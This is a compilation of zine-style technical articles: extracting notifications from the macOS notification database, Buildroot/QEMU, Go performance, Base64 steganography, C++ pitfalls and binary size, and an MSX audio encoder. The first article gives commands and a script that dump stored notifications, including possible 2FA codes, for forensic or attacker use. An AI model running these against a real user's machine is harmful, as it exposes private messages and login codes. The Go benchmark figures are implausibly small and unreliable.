Notifications are small pop-up windows that show up on the top right of the screen and show us various information. For example, here is one from Music showing the next played song.

The messages of these notifications can contain valuable information for an attacker (for example a 2FA code from a message) or in a forensics investigation. Let's explore where they are stored and how we can read them.

In macOS Sonoma, these messages are stored inside the file $DARWIN_USER_DIR/com.apple.notificationcenter/db2/db. DARWIN_USER_DIR is a special directory outside of the traditional HOME folder, where data can be stored by the applications. We can get the location of it by issuing the command getconf DARWIN_USER_DIR. This directory typically looks like /var/folders/8s/nsmp_98934g5ljv0_njcrm4m0000gn/0/ and it's derived from the user's UUID.

As of macOS Sequoia this database was moved under ~/Library/Group Containers/group.com.apple.usernoted/db2/db where it's protected by macOS's privacy protection, TCC (Transparency, Consent and Control), thus further privileges (e.g.: Full Disk Access) are required to access the database.

The database is in standard sqlite format, let's connect to it and examine its tables.

user@mac ~ % DA=`getconf DARWIN_USER_DIR`; sqlite3 $DA/com.apple.notificationcenter/db2/db
...
sqlite> .tables
app         dbinfo      displayed   requests
categories  delivered   record      snoozed

The app table will contain a list of apps, and requests, delivered, displayed, snoozed information about the messages' status. dbinfo is just metadata about the database, like version, etc... The most interesting table is the record one as it will contain the actual messages shown. Let's select the last entry added.

sqlite> select * from record order by delivered_date desc limit 1;
952|74|?u??םN"????$?!|bplist00?
*TstylTintlSappTuuidTdateTsrceSreqTorig
_com.apple.MusicO?u??םN"????$?!#A?B?q??O?}
?j?Kз3d)i??g?$!%&'()TattaTdestTsmacTsubtTu
sdaTcateTtitlTiden??!"#TreloRidSfamSutiSpa
tO?O")#jB*??yu5XM?Wartwork|||746970368.887
245|1|1|

We find that there is a big chunk of data which appears to be encoded. It starts with the word “bplist”, which indicates that this is "binary property list" data. Property lists on macOS can contain arbitrary data; they're used to store various configurations. They're typically used in XML or binary form (but JSON format is also supported). Luckily plutil can convert the binary format for us. Below is a one-liner that will read the last record from the database and decode the data column which stores the actual information about the message.

user@mac ~ % DA=`getconf DARWIN_USER_DIR`; sqlite3 $DA/com.apple.notificationcenter/db2/db "select hex(data) from record order by delivered_date desc limit 1;" | xxd -r -p - | plutil -p -
{
  "app" => "com.apple.Music"
  "date" => 746970368.8872451
(...)
  }
  ]
  "cate" => "plpl_category"
  "dest" => 15
  "iden" => "com.apple.Music.player"
  "smac" => 0
  "subt" => "Yann Tiersen — Le Fabuleux destin d'Amélie Poulain (Bande originale du film)"
  "titl" => "Comptine d'un autre été: la démarche"
  "usda" => {length = 604, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000001c6 }
(...)
}

Finally, we see some readable output. But this query only shows us a single entry of the data. Let's write a short shell script which iterates through all entries and displays them in the same human-readable form. This is shown below.

#!/bin/bash

DB_PATH="$1"

SQL_QUERY="SELECT hex(data) FROM record;"

sqlite3 "$DB_PATH" "$SQL_QUERY" | while read -r HEXDATA; do
    echo "$HEXDATA" | xxd -r -p - | plutil -p -
done
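The same extraction can be sketched without xxd and plutil, using only Python's standard sqlite3 and plistlib modules. This is an untested-on-macOS illustration rather than the author's tooling: the function names are made up, the table and column names (record, data, delivered_date) are the ones shown in the article, and reading the "date" value as seconds since 2001-01-01 UTC is an assumption based on Apple's usual reference date.

```python
import plistlib
import sqlite3
from datetime import datetime, timedelta, timezone

# Assumption: "date" values count seconds from Apple's 2001-01-01 reference date.
APPLE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def read_notifications(db_path):
    """Yield one decoded property list (a dict) per row of the record table."""
    connection = sqlite3.connect(db_path)
    try:
        query = "SELECT data FROM record ORDER BY delivered_date DESC"
        for (blob,) in connection.execute(query):
            yield plistlib.loads(blob)   # binary plists are detected automatically
    finally:
        connection.close()


def apple_time(seconds):
    """Convert seconds since the Apple reference date to a datetime."""
    return APPLE_EPOCH + timedelta(seconds=seconds)
```

A caller would loop over read_notifications(path) and print fields such as record["app"]. The "usda" bytes in the output above begin with 62706c69 73743030, which is "bplist00", so that value appears to be a nested binary plist that could be passed through plistlib.loads() again.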

Csaba Fitzl
Blog: https://theevilbit.github.io/
X/Twitter: @theevilbit SAA-NA-TIP 0.0.7
REVERSE ENGINEERING CONFERENCE
ORLANDO, FL
2025.02.28 - 2025.03.01
TICKETS AVAILABLE NOW

https://re-verse.io

Become an
exploit-dev Learn:
---------------------
➔ Reverse Engineering
➔ Memory Corruption
without leaving ➔ Shellcoding
➔ Stack Canaries
➔ DEP + ROP
➔ ASLR + Leaks
➔ Heap + Use-After-Free
your ➔ Race Conditions
-------------------------
browser

.--
.-- .-
.- .-.
.-. --.
--. .-
.- --
-- .. ...
... .-.-.-
.-.-.- .-.
.-. .. -- ..---
..--- .-.-.-
.-.-.- ...
... -.--
-.-- ...
... -- .. --
-- ...
...

https://wargames.ret2.systems
Make Your Own Linux with Buildroot and QEMU Operating Systems

Make Your Own Linux with Buildroot and QEMU

We will build a working Linux image of a test system and fire it up in the emulator. Thanks to QEMU, we don't need external hardware, SD cards or other equipment. All you need is a laptop with Linux and an internet connection.

Buildroot is a flexible and powerful open-source tool for developing Linux-based operating systems, especially for embedded devices. It is designed to simplify and speed up the process of building a system.

QEMU is open-source software that performs hardware virtualization. Together with KVM, it can provide a quick and performant simulation environment. It's widely used for tasks such as running and testing different operating systems, especially embedded targets.

By building a system from source, we have more flexibility than when downloading ready-made packages, and by using automation scripts, we can reduce the repetitive and tedious tasks involved in building our custom Linux distro.

Buildroot has a collaborative community and one of the best sets of technical docs I've seen in the industry. Unfortunately, it is still not very well indexed by either Google or AI assistants. Make sure to check out the project homepage, where it's all at: https://buildroot.org/

Now - Let's get started!

We download the project code from source. Buildroot is an open-source tool, so we can grab it straight from the project's Git repository:

    git clone https://git.buildroot.org/buildroot
    cd buildroot/
    git checkout -b my_root origin/2024.02.x

The above commands download the latest master with all the history and then create our private branch based on the latest LTS (Long Term Support) branch. This is the safest solution, as LTS branches are usually very well tested and deliberately released for wide use.

We have the code, now we can get ready to build. We will be building the image for QEMU so that, thanks to the power of emulation, we can immediately check that our image works.

Let's mount up and set up the configuration. Fortunately, there are already plenty of default configurations provided by the project. We can see them via the command:

    make list-defconfigs

We are interested in the QEMU configuration for the x86_64 architecture, but feel free to choose any other QEMU configuration; the remaining steps in this tutorial will be the same. To write our default configuration into the working .config file (this is what is used when building a particular image), we type:

    make qemu_x86_64_defconfig

This is the end of the configuration if you are interested in the default, minimalist image. It's enough to start with, but if you want to extend the image with additional tools, such as text editors or network commands, you can do so with '$ make menuconfig'.

We have the configuration, now all we need to do is build the system using the command:

    make -j$(nproc)

This is an improvement on calling plain 'make'. It runs the build on all available CPU cores, which makes the whole thing go faster. And the build process will not be quick... You can definitely take a coffee break or walk a dog. Relevant XKCD: https://xkcd.com/303/

After a long while, the build process will finish and the following log will appear:

    >>>   Executing post-image script board/qemu/post-image.sh

This means all target files were generated successfully. Now it's time to verify that the files generated by Buildroot will work. Normally, we would need hardware on which to load our kernel image and rootfs. Fortunately, thanks to QEMU, we can do this quickly and painlessly.

The resulting files can be found here:

    ls output/images/
    bzImage  rootfs.ext2  start-qemu.sh

Here bzImage is the compressed kernel image and rootfs.ext2 is the rootfs image (the place where all needed files and libraries are).

How to test and launch our new system? Buildroot has thought of us and has already prepared a script that passes the appropriate arguments to the QEMU command and fires up our Linux. Type:

    ./start-qemu.sh

After a while, we should see the first logs from the system start and, a few seconds later, the login prompt (login: root, no password):

    Welcome to Buildroot
    buildroot login:

We have full access to our own freshly built Linux! Note that the system is very limited and small, with only basic functions. You can use the '$ cd /' command to go to the root directory and list its contents. The system is small but functional.

Once you get the hang of the basics, you can start adding new packages, modifying the kernel configuration and changing the bootloader as you wish (and your platform permits). Happy hacking!

Karol Przybylski
https://linuxdev.pl/
SAA-ALL 0.0.7 27
Programming Analyzing and Improving Performance Issues with Go applications

Analyzing and Improving Performance Issues with Go Applications

The goal of every software developer should be to design and implement a fun-to-use product, and slow software is never fun-to-use. On the contrary, making your own software faster is always a joy - so let me tell you about some things I found fun and practical when reworking Go applications around performance improvements.

Let's start off with some tales of mine and why you should even read this: I wrote an article about a leetcode solution and how I made it significantly faster [1]. I created a programming language and made it 8 times faster afterwards [2]. I wrote a paper about the garbage collection implementations of programming languages with a friend and Go was featured in it [3]. Furthermore, I implemented a just-in-time compiler and made a Go runtime for a programming language, making it 14 times faster [4]. I am also currently working on a JSON parser for Go that's already beating the encoding/json package [5].

Analyzing Applications

To find areas for improvement, we can use the package Go provides for this exact purpose. This isn't the place to discuss specifics, but I recommend tinkering with the package.

    package main
    import ("os"; p "runtime/pprof") // "os" is needed for os.Create
    func main() {
        f, _ := os.Create("cpu.pprof") // error ignored for brevity
        p.StartCPUProfile(f)
        defer p.StopCPUProfile()
        // logic here
    }

Another way of conducting an analysis is to use hyperfine for comparing the performance of two binaries.

Performance Tips for Go

Let's look at some specific Go tips and tricks: low-hanging, fast, universal changes one can make to get better performance out of existing code. The first specific tip is to start preallocating slices and maps with sizes determined with benchmarks:

    // don't
    a := []byte{}
    m := map[string]int{}
    // do
    a := make([]byte, 0, 16)
    m := make(map[string]int, 16)

The next tip is to carefully decide between the builder / buffer structures, depending on the API you require. I generally recommend using strings.Builder, it's faster than bytes.Buffer:

    BenchmarkBuffer-4         0.0000603 ns/op
    BenchmarkString-4         0.0000466 ns/op
    BenchmarkBufferLarge-4    0.004109 ns/op
    BenchmarkStringLarge-4    0.003431 ns/op

If these options are too slow for you, consider buffering in your own []byte and using *(*string)(unsafe.Pointer(&buf)) or unsafe.String(unsafe.SliceData(buf), len(buf)); both reuse the memory already held by the []byte instead of copying it. The latter option can halve the time spent in string concatenation - however, both approaches use the unsafe package, which makes no guarantees for portability and compatibility [6].

    BenchmarkArray-4          0.0000222 ns/op
    BenchmarkArrayLarge-4     0.002167 ns/op

If you consider a function to be hot, i.e. it is called often and in loops, you should switch from a generic function to a specific function - if applicable.

    func generic[T any](data any) (T, bool) {
        v, ok := data.(T)
        if !ok { var e T; return e, false }
        return v, ok
    }
    func specific(data any) (bool, bool) {
        switch v := data.(type) {
        case bool:
            return v, true // return the asserted value, not a constant
        default:
            return false, false
        }
    }

The results are very situation dependent and require lots of benchmarking.

    BenchmarkGeneric-4        0.0003623 ns/op
    BenchmarkSpecific-4       0.0003494 ns/op

To minimize the usage of expensive syscalls and to batch input/output actions, the bufio package should always be used for files and other file-like structures. The final tip is to use (*bytes.Reader).ReadByte instead of (*bytes.Reader).ReadRune.

    BenchmarkReadByte-4       0.0004150 ns/op
    BenchmarkReadRune-4       0.0008462 ns/op

To sum up: always benchmark all changes and note their improvements. If you make a lot of long-lived copies, as is often the case with interpreters and parsers, either use an arena or pointers - copying can be expensive if there are a lot of those. Always search for fast paths: the goal is to always do less, so look for early returns, such as edge cases for zero values and such.

[1] https://xnacly.me/posts/2023/leetcode-optimization/
[2] https://xnacly.me/posts/2023/language-performance/
[3] https://xnacly.me/papers/modern_algorithms_for_gc.pdf
[4] https://xnacly.me/papers/tree-walk-vs-go-jit.pdf
[5] https://github.com/xNaCly/libjson
[6] https://pkg.go.dev/unsafe

xnacly
Blog: https://xnacly.me
Github: https://github.com/xnacly
SAA-TIP 0.0.7 28
King Skull Art

parigraf/pix
Instagram : @parigrafpix
Artstation : https://www.artstation.com/parigraf
SAA-TIP 0.0.7 29
Programming Base64 Unused Bits Steganography

Base64 encoding is well known and used everywhere. There are, however, some less-known quirks related to it,
which are known only to... well, everyone who ever implemented Base64 encoding or decoding manually,
especially if it was tested on a large diverse test set.
Regardless, not everyone has done that, so let's share this one specific trick with everyone else :)
The trick is rather simple, but we do have to start with how Base64 actually works – and this is explained best
with a diagram (TL;DW Base64 basically maps every 3 raw bytes of input to 4 alphabet characters of output):

[Diagram: three input bytes (byte 0, byte 1, byte 2; bits numbered 7 down to 0) are regrouped into four 6-bit unsigned integers (0..63). Each integer is looked up in the code table below and becomes one output character (char 0 to char 3).]

Code Table (Alphabet)

 0 A    8 I   16 Q   24 Y   32 g   40 o   48 w   56 4
 1 B    9 J   17 R   25 Z   33 h   41 p   49 x   57 5
 2 C   10 K   18 S   26 a   34 i   42 q   50 y   58 6
 3 D   11 L   19 T   27 b   35 j   43 r   51 z   59 7
 4 E   12 M   20 U   28 c   36 k   44 s   52 0   60 8
 5 F   13 N   21 V   29 d   37 l   45 t   53 1   61 9
 6 G   14 O   22 W   30 e   38 m   46 u   54 2   62 +
 7 H   15 P   23 X   31 f   39 n   47 v   55 3   63 /
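
The mapping in the diagram can be tried out with a few lines of Python. This is only a sketch: `ALPHABET` and `encode_block` are names made up for this illustration, and the function handles exactly one full 3-byte group (no padding).

```python
import base64

# The standard Base64 alphabet, in the same order as the code table.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def encode_block(block: bytes) -> str:
    """Encode exactly 3 raw bytes into 4 Base64 characters."""
    if len(block) != 3:
        raise ValueError("this sketch only handles full 3-byte groups")
    n = int.from_bytes(block, "big")  # the 24 bits as one integer
    # Cut the 24 bits into four 6-bit numbers, most significant first.
    indices = [(n >> shift) & 0x3F for shift in (18, 12, 6, 0)]
    return "".join(ALPHABET[i] for i in indices)


if __name__ == "__main__":
    print(encode_block(b"Man"))
    print(base64.b64encode(b"Man").decode("ascii"))  # library result for comparison
```

Both lines print the same four characters, since the library performs the same regrouping internally.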


The above diagram is great if the length of data we're encoding is a multiple of 3. If it's not, we're in this weird
situation, where we don't really have to output full 4 characters, since 1⅓ or 2⅔ characters would be enough
(this is where the famous = sign comes into play in the role of padding). But characters are indivisible, meaning
they cannot be split into one-third or two-thirds of a character. So, we get left with unused bits...

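[Diagram: with one leftover input byte (byte 0), two characters are emitted and the last 4 bits of the second character are unused; with two leftover input bytes (byte 0, byte 1), three characters are emitted and the last 2 bits of the third character are unused.]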

If you are into steganography, this should be enough for you. The unused bits are almost never checked by a
decoder (at least I don't believe I've seen one that would complain about it), meaning you can hide 2 or 4 bits of
data there. That's not a lot, but then again no one said you need to use only one Base64-encoded string.
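
A minimal Python sketch of the trick follows. The names `hide_bits` and `extract_bits` are hypothetical, and the sketch assumes the standard alphabet with `=` padding. It relies on the fact that a canonical encoder leaves the unused bits at zero, so the hidden value can simply be OR-ed in.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def hide_bits(data: bytes, secret: int) -> str:
    """Base64-encode data and store secret in the unused bits."""
    encoded = base64.b64encode(data).decode("ascii")
    pad = encoded.count("=")  # 0, 1 or 2 padding characters
    if pad == 0:
        raise ValueError("length is a multiple of 3, so there are no unused bits")
    unused = 2 * pad  # "=" leaves 2 unused bits, "==" leaves 4
    if not 0 <= secret < (1 << unused):
        raise ValueError("secret does not fit into %d bits" % unused)
    pos = len(encoded) - pad - 1  # last character that carries data
    value = ALPHABET.index(encoded[pos]) | secret
    return encoded[:pos] + ALPHABET[value] + encoded[pos + 1:]


def extract_bits(encoded: str):
    """Return (hidden value, number of unused bits) for one Base64 string."""
    pad = encoded.count("=")
    if pad == 0:
        return 0, 0
    unused = 2 * pad
    pos = len(encoded) - pad - 1
    return ALPHABET.index(encoded[pos]) & ((1 << unused) - 1), unused


if __name__ == "__main__":
    stego = hide_bits(b"A", 0b1011)
    print(stego, base64.b64decode(stego), extract_bits(stego))
```

Python's default (non-strict) `base64.b64decode` is one of the decoders that does not complain: the modified string still decodes to the original data.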
P.S. Yes, this sometimes shows up on CTFs – be on the lookout for tasks with A LOT of Base64 strings.
These illustrations were originally published as part of this blogpost: https://hexarcana.ch/b/20240816-base64-beyond-encoding/

Gynvael Coldwind
HexArcana Cybersecurity GmbH
https://hexarcana.ch/
SAA-ALL 0.0.7 30
C++ Pitfalls Programming

C++ Pitfalls

You could probably write an entire book about things in this language that are unintuitive and require extra caution. C++ has so many details that it is easy to make mistakes that could result in hours of debugging. In this article, I explain some of the pitfalls you can fall into when programming in this language and share my experience with them.

Operator precedence

Some time ago, I wrote code that had an "if" condition expression like in the example below:

    int x = 2;
    if (x & 1 == 0)
        std::cout << "true";
    else
        std::cout << "false";

    Output: false

When I ran my program, I noticed something wrong. After some time debugging it, the last thing to check was that "if" statement. When I removed the "== 0" part and negated the expression, it finally worked! It was at this moment I realized that I had completely forgotten about operator precedence rules. If we look at the reference list [1], the "==" operator is just above the "&" operator, so it is evaluated first: the condition is parsed as x & (1 == 0), i.e. x & 0, which is always false. The lesson is to be more of a defensive programmer, e.g. by using parentheses in such cases.

Arithmetic conversion rules

I noticed this thing when reading about arithmetic conversion rules [2]. I have never caught a bug related to it, but it looks like an easy-to-introduce one, so I wanted to cover it here. Suppose we have code like below:

    unsigned int x = 3u;
    int y = -5;
    if (y < x)
        std::cout << "true";
    else
        std::cout << "false";

    Output: false

For a human, it is logical that -5 is less than 3, but in C++ there are various integer types and in most operations data types need to match. In this example, both operands of the "<" operator are converted to unsigned int, which makes the value of y really big (the bytes holding the value are just reinterpreted as an unsigned type) and greater than x. I encourage you to read about the conversion rules at least once, as they are not trivial at times.

Right bit-shift

This one I encountered pretty early in my C++ programming learning path. I tried to do a right bit-shift of a value of signed type like in the example below:

    int i = 0x80000000;
    i >>= 31;
    std::cout << std::hex << i;

    unsigned int ui = 0x80000000;
    ui >>= 31;
    std::cout << " " << std::hex << ui;

    Output: ffffffff 1

The one thing I didn't know then was that the C++ compiler generates a SAR (not SHR) assembly instruction (on x86) [3] from it, called an "arithmetic shift". This instruction preserves the sign of the value being shifted. In effect, the most significant bit (MSB) is copied to the right, not shifted. This is most important when the MSB is a 1, because then the vacated high bits are filled with ones, which changes the value in a way we may not want. (Before C++20, the result of right-shifting a negative value is implementation-defined; since C++20 it is defined to be an arithmetic shift.)

Implicit conversions

Sometimes, code that we would never want to compile compiles just fine. Let's imagine the following code example:

    class A {
        int x;
    public:
        A(int x) : x(x) {}
    };

    int main() {
        A a(5);
        a = 3; // ???
        return 0;
    }

But why does a = 3; compile? a is of class type and 3 is an int! Such functionality was "kindly" provided by A's one-argument constructor. It allows int values to be implicitly converted to this type. But why would we not want it to compile? Aren't implicit conversions convenient? Maybe, at times, they are, but they can easily introduce a bug. That is why it is good to always add the explicit specifier to the declaration of a one-argument constructor, which prevents implicit conversions, unless we are sure that we need such implicit conversions in our code.

Order of evaluation

A word about the order of evaluation of expressions in C++ [4]:

    Order of evaluation of any part of any expression, including order of evaluation of function arguments is unspecified (...). The compiler (...) may choose another order when the same expression is evaluated again.

This means we cannot expect any specific order of function calls in such an expression. It's not limited only to the evaluation of function arguments. Below is an example of this. Please note that the letters could be printed in any possible order during the z() function call and the return value calculation.

    #include <cstdio>

    int a() { return std::puts("a"); }
    int b() { return std::puts("b"); }
    int c() { return std::puts("c"); }
    void z(int, int, int) {}

    int main()
    {
        z(a(), b(), c());
        return a() + b() + c();
    }

    Output: unspecified

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As you can see, C++'s traps can hide anywhere in your code, so it is important to know how you can protect yourself from them. Knowing every detail would be very hard, which is why there are tools that can help us. The "GCC" compiler provides options such as -Wall, -Wextra and -Wpedantic [5] that enable additional checks for dangerous and error-prone code structures. But when you enable those you may encounter another barrier, which is your will to actually fix the incoming compiler warnings, so I also recommend adding the -Werror option for good measure (all warnings will then be treated as compile errors). There are also other tools such as "clang-tidy" to check code even more thoroughly, but code analysis tools are a topic for another article ;)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[1] https://en.cppreference.com/w/cpp/language/operator_precedence
[2] https://www.learncpp.com/cpp-tutorial/arithmetic-conversions/
[3] https://c9x.me/x86/html/file_module_x86_id_285.html
[4] https://en.cppreference.com/w/cpp/language/eval_order
[5] https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html

Artur Nowicki
https://github.com/arturn-dev
SAA-ALL 0.0.7 [email protected] 31
Programming EasyMSXbas2wav

EasyMSXBAS2wav
https://github.com/4nimanegra/EasyMSXBAS2wav

On this page, we will create a simple Bash script to encode MSX Basic programs into WAV files.

MSX computers have different methods for encoding data on audio tapes. The way the bits are stored can involve encoding zeros as square waves using either 1200 Hz or 2400 Hz. Ones are encoded using a square wave that is twice as fast as the signal for zeros. In this work, we have encoded the data by using 1200 Hz for zeros and 2400 Hz for ones.

Each byte should be encoded by preceding it with a zero and using two ones as a trailer. Thus, each byte is encoded using 11 bits.

The stored data begins with a header consisting of a long beep: a sequence of ones over 16,000 pulses, followed by the byte 0xEA repeated 10 times and the program name in 6 bytes. After this, blocks of 256 bytes are encoded, each preceded by a short beep (ones over 4,000 pulses). At the end, an additional block with the byte 0x1A repeated 256 times is added.

The code is as follows:

    #! /bin/bash
    TEMPDATAFILE="tmp/tempdata.tmp";
    encode(){
        BIT=$(($1));
        if [ $BIT == 0 ]; then
            PARAM=18;
            TOTAL=1;
        else
            PARAM=9;
            TOTAL=2;
        fi;
        while [ $TOTAL -gt 0 ]; do
            I=0;
            while [ $I -lt $PARAM ]; do
                printf "\xC0" >> $TEMPDATAFILE;
                I=$(($I+1));
            done;
            I=0;
            while [ $I -lt $PARAM ]; do
                printf "\x40" >> $TEMPDATAFILE;
                I=$(($I+1));
            done;
            TOTAL=$(($TOTAL-1));
        done;
    }
    header(){
        if [ "long" == "$1" ]; then
            PULSES=8000;
        else
            PULSES=2000;
        fi
        II=0;
        while [ $II -lt $PULSES ]; do
            encode 1;
            II=$(($II+1));
        done;
    }
    silence(){
        I=0;
        while [ $I -lt $((18*4000)) ]; do
            AUX=`printf "%02X" 127`;
            printf "\x$AUX" >> $TEMPDATAFILE;
            I=$(($I+1));
        done;
    }
    wavheader(){
        printf "RIFF";
        printf "\xFF\xFF\xFF\xFF";
        printf "WAVEfmt ";
        printf "\x10\x00\x00\x00\x01\x00\x01\x00";
        printf "\x44\xac\x00\x00";
        printf "\x44\xac\x00\x00";
        printf "\x01\x00\x08\x00";
        AUX=`printf "%08X" $(($1))`;
        AUX=`awk '{print "\\\\x"substr($1,7,2)"\\\\x"substr($1,5,2)"\\\\x" \
            substr($1,3,2)"\\\\x"substr($1,1,2)}' < <(printf "$AUX")`;
        printf "data$AUX";
    }
    encodefile(){
        if [ -e $1 ]; then
            BYTELEN=`cat $1 | tr "\n" "\r" | xxd -i | tr "\n" " " | sed s/" "/""/g | \
                awk -F "," '{print NF}'`;
            CONT=0;
            while read A; do
                if [ $CONT == $((256*11)) ]; then
                    silence;
                    header;
                    CONT=0;
                fi;
                encode $A;
                CONT=$((CONT+1));
            done < <(cat $1 | xxd -b | sed s/".*:"/""/ | sed s/"^ "/""/ | sed s/"[ ][ ].*"/""/ | \
                sed s/" "/"\n"/g | awk '{print "0";I=8;while(I>0){print substr($1,I,1);I=I-1;}print \
                "1";print "1";}');
            if [ "" == "$2" ]; then
                ZEROS=$((256-$BYTELEN));
                II=0;
                while [ $II -lt $ZEROS ]; do
                    for III in 0 0 0 0 0 0 0 0 0 1 1; do
                        encode $III;
                    done;
                    II=$(($II+1));
                done;
            fi;
        fi;
    }
    msxheaderfile(){
        echo -n "" > tmp/headerfile.tmp;
        II=0;
        while [ $II -lt 10 ]; do
            printf "\xEA" >> tmp/headerfile.tmp;
            II=$(($II+1));
        done;
        echo "$1" | awk -F "/" '{printf substr($NF,1,6);}' >> tmp/headerfile.tmp;
    }
    lastblockfile(){
        echo -n "" > tmp/lastblockfile.tmp;
        II=0;
        while [ $II -lt 256 ]; do
            printf "\x1A" >> tmp/lastblockfile.tmp;
            II=$(($II+1));
        done;
    }
    helpme(){
        echo "$0 is used to convert bas MSX basic programs into wav files.";
        printf "\t$0 command must be used with 2 arguments:\n";
        printf "\t\t$0 file.bas output.wav\n"
        echo "";
        printf "\tfile.bas: The name of the file with the basic program in ascii.";
        echo "";
        echo "";
        printf "\toutput.wav: The name of the output file where the wav is created.";
        echo "";
        echo "";
    }
    if [ "" != "$1" ]; then
        if [ "" != "$2" ]; then
            if [ -e "$1" ]; then
                if [ -e "$2" ]; then
                    echo "$2 exists, please remove it before running the program.";
                else
                    touch $2;
                    if [ "$?" == "0" ]; then
                        mkdir tmp 2> /dev/null;
                        echo -n "" > $TEMPDATAFILE
                        header "long";
                        msxheaderfile $1;
                        encodefile "tmp/headerfile.tmp" "NOZEROS";
                        silence;
                        header;
                        encodefile $1;
                        silence;
                        header;
                        lastblockfile;
                        encodefile "tmp/lastblockfile.tmp" "NOZEROS";
                        TOTALLONG=`ls -al $TEMPDATAFILE | awk '{print $5}'`;
                        wavheader $TOTALLONG > $2;
                        cat $TEMPDATAFILE >> $2;
                        rm tmp/headerfile.tmp tmp/lastblockfile.tmp tmp/tempdata.tmp
                    else
                        echo "Can not write on $2.";
                    fi;
                fi;
            else
                echo "$1 does not exist.";
            fi;
        else
            helpme;
        fi;
    else
        helpme;
    fi;

The script should be executed as follows:

    ./convert.sh Easytr0n.bas ./out/Easytr0n.wav
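
To make the byte framing easier to see in isolation, here is a small Python sketch of what the script's encode() function and its awk one-liner do together. It is an illustration under stated assumptions, not part of the original tool: the names `frame_byte`, `bit_samples` and `encode_bytes` are made up here, while the sample values (0xC0 and 0x40), the half-period lengths (18 and 9 samples) and the 44,100 Hz sample rate are read off the Bash script and its WAV header.

```python
SAMPLE_RATE = 44100  # bytes 44 AC 00 00 in the script's WAV header


def frame_byte(value: int) -> list:
    """Frame one byte: start bit 0, eight data bits (least significant
    bit first, as the awk loop emits them), then two stop bits 1."""
    data_bits = [(value >> i) & 1 for i in range(8)]
    return [0] + data_bits + [1, 1]


def bit_samples(bit: int) -> bytes:
    """8-bit unsigned PCM samples for one bit, mirroring encode():
    a zero is one slow square-wave cycle, a one is two fast cycles."""
    half, cycles = (18, 1) if bit == 0 else (9, 2)
    return (b"\xC0" * half + b"\x40" * half) * cycles


def encode_bytes(payload: bytes) -> bytes:
    """Concatenate the samples of every framed bit of every byte."""
    return b"".join(bit_samples(bit) for byte in payload for bit in frame_byte(byte))


if __name__ == "__main__":
    print(frame_byte(0xEA))            # the 11 bits for one header byte
    print(len(encode_bytes(b"\xEA")))  # samples needed for one byte
    print(SAMPLE_RATE / 36)            # frequency of the "zero" tone in Hz
```

Every bit occupies 36 samples, so a zero comes out at 44100 / 36 = 1225 Hz and a one at twice that, which approximates the nominal 1200 Hz and 2400 Hz tones.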

Garcia-Jimenez, Santiago
https://github.com/4nimanegra
32 CC BY 4.0
www.trailofbits.com

We don't just fix bugs, we fix software.

Innovative Research | Practical Solutions | References

Pure-Rust implementation of SLH-DSA
Appsec Testing Handbook
Curated list of ML security resources
ZKDocs
Guidance for deploying Nitro Enclaves
Exploiting ML models

CONTACT TRAIL OF BITS

Since 2012, Trail of Bits has helped secure some of the world's most targeted organizations and devices. We combine high-end security research with a real-world attacker mentality to reduce risk and fortify code.

AI/ML | Application Security | Blockchain | Cryptography | Research & Engineering


Programming Keep your C++ binary small - Coding techniques

Keep your C++ binary small - Coding techniques

C++ is one of the best programming languages to optimise your software. Usually, we talk about runtime performance when it comes to optimisation, but today let's talk about C++ and binary sizes.

In this article, we are going to cover different coding techniques affecting binary sizes. You can also use compiler and linker flags to influence the size of the generated code, sometimes in combination with coding techniques, but those are not the topic here.

It's important to emphasize that the techniques below are optimization techniques, not general best practices.

Object initialization

When it comes to initialization, we have three aspects to consider. The size of an object matters mostly if it is massively used. In many cases, it means that the object is used in a large container.

Containers with heap allocation, such as std::vector or std::list, can have a smaller binary footprint than a C-style array or a std::array, as the arrays can be initialized at compile-time.

Next is the aspect of storage duration. Variables with static storage duration can end up in the binary, while with other storage durations, the code creating these variables will be part of the binary.

Initial values of member variables also matter. Give them their type's default values, so that the compiler can heavily optimize by setting blocks of memory to zero instead of generating a lot of initialization code.

Special member functions

By default, it's recommended to follow the Rule of Zero. Otherwise, for smaller binary sizes, consider moving the definitions of even defaulted special member functions to the .cpp files to avoid inlining.

The use of virtual functions

Speaking about special member functions, we must mention virtual destructors. They take a heavy toll on the binary size, so you should only declare a destructor virtual when using dynamic polymorphism. It's only the first virtual function - which is usually the destructor - that is disproportionately costly, as it implies the creation of a virtual table (a.k.a. vtable) and all the necessary code to handle dynamic polymorphism. After that, each new virtual member function only adds one line to the vtable per type, which is somewhere around 40 bytes depending on the implementation.

Templates

Write minimal templates. If you have a class or function template where you can separate longer chunks of code not using the template parameters, extract them into non-templated functions and classes, so that only the code that depends on the template parameters will be part of each template expansion.

You might try out extern templates for more gains! In C++, extern variables indicate that you'll provide no definitions; the linker should find them.

For templates, it means that code generated for a template specialization marked extern will not be part of a given object file; another translation unit will provide it. Here is the handiest way to use it.

In the same header where you declare the template, mark the specializations you want extern. In the corresponding .cpp file, provide all the explicit template instantiations. This way, each file including the template declaration will also include the externalization, and via the .cpp file they will get the actual definition.

    // foo.h
    template<typename T>
    void foo(T i) { /* … */ }
    extern template void foo<int>(int i);

    // foo.cpp
    #include "foo.h"
    template void foo<int>(int);

This isn't a best practice, but an optimization technique with certain drawbacks, especially when it comes to link-time optimization. Measure before you merge!

Passing functions to functions

Speaking about bloaty templates, std::function must be mentioned. It is a convenient but costly way to pass a callable to another function. Instead, you can also use function pointers if you don't need lambda captures. In combination with a using alias, the readability is also acceptable. Another option is to use your own templates, potentially constrained with the power of concepts.

Sándor Dargó
Blog: https://www.sandordargo.com/
34 X/Twitter: @SandorDargo SAA-ALL 0.0.7
Mobile Coding Journey Programming

Mobile Coding Journey

When I was a child, I loved building things with Lego bricks. You have some basic building blocks, you combine them in all sorts of fascinating ways, you create structures. You can build a car or a truck, an airplane or a ship. It felt awesome. Why buy pre-built toys at all? Give me more Lego bricks!

Time went by. Lego bricks were stashed under the bed - I was too grown up to play with them. I lived in a small village, so we had a lot of fun climbing trees and exploring many new, faraway places. Amazing as it was, I felt something was lacking. I missed that joy of building things.

